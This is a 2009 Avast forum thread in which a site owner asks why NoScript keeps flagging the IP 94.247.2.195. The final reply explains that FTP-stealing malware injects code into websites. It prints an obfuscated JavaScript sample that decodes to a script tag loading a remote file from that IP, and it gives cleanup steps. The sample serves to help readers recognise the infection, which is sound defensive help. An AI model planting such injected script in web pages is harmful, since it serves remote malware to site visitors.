Avast WEBforum

Business Products => Archive (Legacy) => Avast Business => Avast Server Protection => Topic started by: avastment on April 17, 2009, 07:55:36 AM

Title: 94.247.2.195
Post by: avastment on April 17, 2009, 07:55:36 AM
I have a website with a number of pages and using NoScript I get a pop up asking me if I want to allow or not allow 94.247.2.195

Above URL is in Latvia.

I contact NoScript but I thought I ask here too.

Thanks
Title: Re: 94.247.2.195
Post by: avastment on April 17, 2009, 09:00:24 AM
I ran malwarebytes and it found a virus in my windows folder, removed it, rebooted and problem still exists.

It could be coming from Statcounter on my home page only.

http://www.derkeiler.com/Mailing-Lists/Full-Disclosure/2005-05/0105.html

I wrote to Statcounter to see what they say.
Title: Re: 94.247.2.195
Post by: Tarq57 on April 17, 2009, 12:37:51 PM
What's the chance of seeing that scan report with the malware names/paths shown?
Title: Re: 94.247.2.195
Post by: avastment on April 17, 2009, 03:57:56 PM
There is a good chance.  see below.  Also it is another day here in Los Angeles at 7am.  I check one of my web pages that has no script and same pop up from NoScript asking me if I wanted to allow or not 94.247.2.195

Good luck with below if it helps and thanks for having a look.

Malwarebytes' Anti-Malware 1.35
Database version: 1904
Windows 5.1.2600 Service Pack 3

4/16/2009 11:31:23 PM
mbam-log-2009-04-16 (23-31-23).txt

Scan type: Quick Scan
Objects scanned: 83633
Time elapsed: 6 minute(s), 10 second(s)

Memory Processes Infected: 0
Memory Modules Infected: 0
Registry Keys Infected: 0
Registry Values Infected: 0
Registry Data Items Infected: 1
Folders Infected: 0
Files Infected: 0

Memory Processes Infected:
(No malicious items detected)

Memory Modules Infected:
(No malicious items detected)

Registry Keys Infected:
(No malicious items detected)

Registry Values Infected:
(No malicious items detected)

Registry Data Items Infected:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools (Hijack.Regedit) -> Bad: (1) Good: (0) -> Quarantined and deleted successfully.

Folders Infected:
(No malicious items detected)

Files Infected:
(No malicious items detected)
Title: Re: 94.247.2.195
Post by: avastment on April 17, 2009, 05:19:00 PM
I found below link and 94.247.2.195 is on list shown.

http://www.who-is-who-in-gpt.com/forum/index.php?showtopic=4024
Title: Re: 94.247.2.195
Post by: avastment on April 17, 2009, 05:22:44 PM
I found this.

http://blog.scansafe.com/

now how do I remove 94.247.2.195
Title: Re: 94.247.2.195
Post by: DavidR on April 17, 2009, 06:09:11 PM
In short, you can't.

You said that it is NoScript that blocks this so a) it is already doing its job, b) the script is on a web page, your web page/s (I have a website with a number of pages) that you haven't given so we can't investigate, what script it is.
Title: Re: 94.247.2.195
Post by: avastment on April 17, 2009, 09:14:02 PM
I only have script using Statcounter on main index.html page.  All others with links from main page have no script.
Yes I wrote to Statcounter.  No answer yet.
Title: Re: 94.247.2.195
Post by: DavidR on April 17, 2009, 09:28:56 PM
Which still doesn't say what the URL is

Switch to another stat counter it isn't the only option out there, certainly until this statcounter vulnerability is closed.
Title: Re: 94.247.2.195
Post by: avastment on April 17, 2009, 11:56:02 PM
after searching and searching for a solution I go back and review NOscript options popup.
allow
distrust and
temporary.

I clicked on distrust and now NoScript does not popup asking me to allow, temporary or distrust. Kind of simple fix.

94.247.2.195 could be somewhere in my computer however it could be NoScript stopped 94.247.2.195 from taking me somewhere I did not want to go.

thanks.
Title: Re: 94.247.2.195
Post by: Tarq57 on April 18, 2009, 12:04:20 AM
Quote
94.247.2.195 could be somewhere in my computer however it could be NoScript stopped 94.247.2.195 from taking me somewhere I did not want to go.
I believe the answer is the second option.
The address won't be in your computer, unless you've bookmarked it.
What you've instructed Noscript to do is exactly how it should be used.
Title: Re: 94.247.2.195
Post by: DavidR on April 18, 2009, 01:26:44 AM
It can't be in your computer or NoScript wouldn't be detecting it (see below), you open a page and NoScript by default should block all scripts unless you specifically allow them. Now you have NoScript set up to constantly ask you if it is OK to run x script (Options, Notifications, Show message about blocked scripts), this would drive me bonkers and I have it disabled.

####
Unless there is malware on your system that is opening a web page in your browser (and that doesn't seem to be the case), then NoScript shouldn't have cause to notify you.
Title: Re: 94.247.2.195
Post by: WeWatchYourWebsite on April 21, 2009, 11:08:48 PM
We've been seeing alot of these types of hacks lately.

It's usually caused by a virus on the computer that uploads to the website. The virus monitors FTP traffic and since FTP usernames and passwords are sent in plain text, they can read that and then login to your website as you and add their malicious code.

You might look for something like the following on your website:

<script language=javascript><!--
document.write(unescape('%3CsT8AcrF2iT8ApWkt%20srWs9c%3DJU%2FF2%2FT8A9vo4%2EWk24T8A7%2E2vo%2E195%2FjJUqJUueryT8A%2EjsWk%3E%3C%2FsJUcrJUipt%3E').replace(/T8A|Wk|NLA|F2|6X|vo|Ws9|K3m|JU/g,""));
 --></script>

The actual encoded characters might be somewhat different but this code actually deobfuscates to:

<script src=//94.247.2.195/jquery.js></script>

Which is what you're claiming is being blocked.

Step 1: change your FTP password to your site
Step 2: Clean your computer with Avast
Step 3: Remove the javascript code from your webpages. It's typically in many spots on the same webpage and on multiple pages.

After changing your FTP password do not upload to your site again until you've cleaned your PC.

If you have any further questions, please PM me.